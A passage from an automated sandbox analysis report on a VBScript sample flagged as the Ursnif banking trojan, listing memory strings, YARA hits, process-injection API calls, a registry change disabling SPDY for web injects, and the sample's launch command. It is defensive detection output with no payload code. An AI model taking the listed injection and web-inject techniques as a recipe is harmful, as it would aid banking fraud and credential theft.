Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001B.00000002.930160141.000001A03E57D000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.726757645.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727219097.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.729332046.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727028559.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.828135151.000000000510F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727067150.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.903821312.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.886705349.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727201837.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.726909604.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905558727.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.772246941.000000000520D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1096144561.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.913163310.0000017896F0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727174189.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.912383715.000000000009E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727239812.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5220, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.726757645.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727219097.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.729332046.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727028559.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.828135151.000000000510F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727067150.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.903821312.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.886705349.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727201837.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.726909604.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.905558727.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.772246941.000000000520D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1096144561.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.913163310.0000017896F0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727174189.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.912383715.000000000009E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.727239812.0000000005488000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4540, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5220, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Contains functionality to call native functions

Source: C:\Windows\explorer.exe	Code function: 34_2_04DACCA0 NtReadVirtualMemory,	34_2_04DACCA0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	34_2_04DBF560
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBAD14 NtQuerySystemInformation,	34_2_04DBAD14
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBFFCC NtMapViewOfSection,	34_2_04DBFFCC
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	34_2_04DCF7EC
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	34_2_04DC676C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB387C NtCreateSection,	34_2_04DB387C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB3830 NtWriteVirtualMemory,	34_2_04DB3830
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB1AC4 NtQueryInformationProcess,	34_2_04DB1AC4
Source: C:\Windows\explorer.exe	Code function: 34_2_04DABAB4 NtAllocateVirtualMemory,	34_2_04DABAB4
Source: C:\Windows\explorer.exe	Code function: 34_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	34_2_04DE1002
Source: C:\Windows\System32\control.exe	Code function: 35_2_00073830 NtWriteVirtualMemory,	35_2_00073830
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007387C NtCreateSection,	35_2_0007387C
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006BAB4 NtAllocateVirtualMemory,	35_2_0006BAB4
Source: C:\Windows\System32\control.exe	Code function: 35_2_00071AC4 NtQueryInformationProcess,	35_2_00071AC4
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006CCA0 NtReadVirtualMemory,	35_2_0006CCA0
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	35_2_0007F560
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008ADD4 NtQueryInformationProcess,	35_2_0008ADD4
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	35_2_0008676C
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007FFCC NtMapViewOfSection,	35_2_0007FFCC
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_0008F7EC
Source: C:\Windows\System32\control.exe	Code function: 35_2_000A1002 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_000A1002
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	37_2_0000017896EFF7EC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE1AC4 NtQueryInformationProcess,	37_2_0000017896EE1AC4
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896F11002 NtProtectVirtualMemory,NtProtectVirtualMemory,	37_2_0000017896F11002

Detected potential crypto function

Source: C:\Windows\explorer.exe	Code function: 34_2_04DCA4BC	34_2_04DCA4BC
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA37B8	34_2_04DA37B8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCAFB8	34_2_04DCAFB8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DAB75C	34_2_04DAB75C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBF770	34_2_04DBF770
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC676C	34_2_04DC676C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC0034	34_2_04DC0034
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC91A0	34_2_04DC91A0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCC164	34_2_04DCC164
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB9138	34_2_04DB9138
Source: C:\Windows\explorer.exe	Code function: 34_2_04DAC134	34_2_04DAC134
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC74CC	34_2_04DC74CC
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB0CC0	34_2_04DB0CC0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DABCF8	34_2_04DABCF8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB3CE0	34_2_04DB3CE0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC94B8	34_2_04DC94B8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB9CB0	34_2_04DB9CB0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBD4A8	34_2_04DBD4A8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA5474	34_2_04DA5474
Source: C:\Windows\explorer.exe	Code function: 34_2_04DAD460	34_2_04DAD460
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB1D94	34_2_04DB1D94
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCB516	34_2_04DCB516
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA6D08	34_2_04DA6D08
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB452C	34_2_04DB452C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBB520	34_2_04DBB520
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC26B4	34_2_04DC26B4
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCBEB0	34_2_04DCBEB0
Source: C:\Windows\explorer.exe	Code function: 34_2_04DAAE04	34_2_04DAAE04
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA9F98	34_2_04DA9F98
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB17B8	34_2_04DB17B8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC20F8	34_2_04DC20F8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCE080	34_2_04DCE080
Source: C:\Windows\explorer.exe	Code function: 34_2_04DBB040	34_2_04DBB040
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC6064	34_2_04DC6064
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA203C	34_2_04DA203C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DCF940	34_2_04DCF940
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB1174	34_2_04DB1174
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC3208	34_2_04DC3208
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC8224	34_2_04DC8224
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA2BC8	34_2_04DA2BC8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB9380	34_2_04DB9380
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA8B5C	34_2_04DA8B5C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DB8B4C	34_2_04DB8B4C
Source: C:\Windows\explorer.exe	Code function: 34_2_04DA7320	34_2_04DA7320
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008C164	35_2_0008C164
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008A4BC	35_2_0008A4BC
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008676C	35_2_0008676C
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006203C	35_2_0006203C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00080034	35_2_00080034
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007B040	35_2_0007B040
Source: C:\Windows\System32\control.exe	Code function: 35_2_00086064	35_2_00086064
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008E080	35_2_0008E080
Source: C:\Windows\System32\control.exe	Code function: 35_2_000820F8	35_2_000820F8
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006C134	35_2_0006C134
Source: C:\Windows\System32\control.exe	Code function: 35_2_00079138	35_2_00079138
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008F940	35_2_0008F940
Source: C:\Windows\System32\control.exe	Code function: 35_2_00071174	35_2_00071174
Source: C:\Windows\System32\control.exe	Code function: 35_2_000891A0	35_2_000891A0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00083208	35_2_00083208
Source: C:\Windows\System32\control.exe	Code function: 35_2_00088224	35_2_00088224
Source: C:\Windows\System32\control.exe	Code function: 35_2_00067320	35_2_00067320
Source: C:\Windows\System32\control.exe	Code function: 35_2_00078B4C	35_2_00078B4C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00068B5C	35_2_00068B5C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00079380	35_2_00079380
Source: C:\Windows\System32\control.exe	Code function: 35_2_00062BC8	35_2_00062BC8
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006D460	35_2_0006D460
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007D4A8	35_2_0007D4A8
Source: C:\Windows\System32\control.exe	Code function: 35_2_000894B8	35_2_000894B8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00079CB0	35_2_00079CB0
Source: C:\Windows\System32\control.exe	Code function: 35_2_000874CC	35_2_000874CC
Source: C:\Windows\System32\control.exe	Code function: 35_2_00070CC0	35_2_00070CC0
Source: C:\Windows\System32\control.exe	Code function: 35_2_00073CE0	35_2_00073CE0
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006BCF8	35_2_0006BCF8
Source: C:\Windows\System32\control.exe	Code function: 35_2_00066D08	35_2_00066D08
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008B516	35_2_0008B516
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007B520	35_2_0007B520
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007452C	35_2_0007452C
Source: C:\Windows\System32\control.exe	Code function: 35_2_00071D94	35_2_00071D94
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006AE04	35_2_0006AE04
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008BEB0	35_2_0008BEB0
Source: C:\Windows\System32\control.exe	Code function: 35_2_000826B4	35_2_000826B4
Source: C:\Windows\System32\control.exe	Code function: 35_2_0006B75C	35_2_0006B75C
Source: C:\Windows\System32\control.exe	Code function: 35_2_0007F770	35_2_0007F770
Source: C:\Windows\System32\control.exe	Code function: 35_2_00069F98	35_2_00069F98
Source: C:\Windows\System32\control.exe	Code function: 35_2_0008AFB8	35_2_0008AFB8
Source: C:\Windows\System32\control.exe	Code function: 35_2_000637B8	35_2_000637B8
Source: C:\Windows\System32\control.exe	Code function: 35_2_000717B8	35_2_000717B8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFC164	37_2_0000017896EFC164
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFA4BC	37_2_0000017896EFA4BC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE1174	37_2_0000017896EE1174
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE9138	37_2_0000017896EE9138
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFF940	37_2_0000017896EFF940
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EDC134	37_2_0000017896EDC134
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF20F8	37_2_0000017896EF20F8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFE080	37_2_0000017896EFE080
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF8224	37_2_0000017896EF8224
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF3208	37_2_0000017896EF3208
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF91A0	37_2_0000017896EF91A0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EDB75C	37_2_0000017896EDB75C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EEF770	37_2_0000017896EEF770
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF676C	37_2_0000017896EF676C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF26B4	37_2_0000017896EF26B4
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFBEB0	37_2_0000017896EFBEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF6064	37_2_0000017896EF6064
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EEB040	37_2_0000017896EEB040
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED203C	37_2_0000017896ED203C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF0034	37_2_0000017896EF0034
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED37B8	37_2_0000017896ED37B8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE17B8	37_2_0000017896EE17B8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFAFB8	37_2_0000017896EFAFB8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED9F98	37_2_0000017896ED9F98
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EEB520	37_2_0000017896EEB520
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE452C	37_2_0000017896EE452C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EDBCF8	37_2_0000017896EDBCF8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EFB516	37_2_0000017896EFB516
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED6D08	37_2_0000017896ED6D08
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE3CE0	37_2_0000017896EE3CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE0CC0	37_2_0000017896EE0CC0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF94B8	37_2_0000017896EF94B8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EF74CC	37_2_0000017896EF74CC
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE9CB0	37_2_0000017896EE9CB0
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EED4A8	37_2_0000017896EED4A8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EDAE04	37_2_0000017896EDAE04
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE1D94	37_2_0000017896EE1D94
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED8B5C	37_2_0000017896ED8B5C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE8B4C	37_2_0000017896EE8B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED7320	37_2_0000017896ED7320
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EDD460	37_2_0000017896EDD460
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED2BC8	37_2_0000017896ED2BC8
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896EE9380	37_2_0000017896EE9380

Java / VBScript file with very long strings (likely obfuscated code)

Source: 1qdMIsgkbwxA.vbs

Initial sample: Strings found which are bigger than 50

PE file does not import any functions

Source: 5ya1ligq.dll.30.dr	Static PE information: No import functions for PE file found
Source: zyvn03im.dll.32.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3AA90121-51A7-7CB8-AB0E-15700F2219A4}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{12BB91A7-499F-1420-6366-8D8847FA113C}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9ACD08EB-31C0-DC3B-8B6E-F5D0EF82F904}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1qdMIsgkbwxA.vbs'
